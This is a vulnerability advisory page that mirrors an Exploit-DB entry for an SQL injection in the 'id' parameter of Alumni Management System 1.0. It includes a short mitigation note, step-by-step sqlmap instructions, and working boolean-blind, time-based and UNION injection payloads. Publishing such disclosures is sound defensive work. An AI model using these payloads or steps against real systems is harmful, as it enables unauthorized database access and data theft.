Alumni Management System 1.0 - 'id' SQL Injection

vendor:

Alumni Management System

by:

Aakash Madaan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Alumni Management System

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE:

CPE: a:alumni_management_system:alumni_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Parrot OS

2020

Alumni Management System 1.0 – ‘id’ SQL Injection

The Alumni Management System 1.0 is vulnerable to SQL Injection. By manipulating the 'id' parameter in the 'view' or 'edit' event page, an attacker can inject malicious SQL queries, leading to information disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Prepared statements or parameterized queries can also be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aakash Madaan
# Date: 2020-12-17
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1. Login to the application with admin credentials

Step 2. Click on "Events" page.

Step 3. Choose any event and select "view" or "edit". The url should be "
http://localhost/index.php?page=view_event&id=2" or "
http://localhost/admin/index.php?page=manage_event&id=1"

Step 4. Capture the request to the "view" or "edit" event page in burpsuite.

Step 5. Save the captured request and run sqlmap on it using "sqlmap -r
request --time-sec=5 --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3
ELSE (SELECT 5620 UNION SELECT 3605) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=edit_student&id=3 AND (SELECT 7847 FROM
(SELECT(SLEEP(5)))LQiE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: page=edit_student&id=-4840 UNION ALL SELECT
NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
-
---

Step 6. Sqlmap should inject the web-app successfully which leads to
information disclosure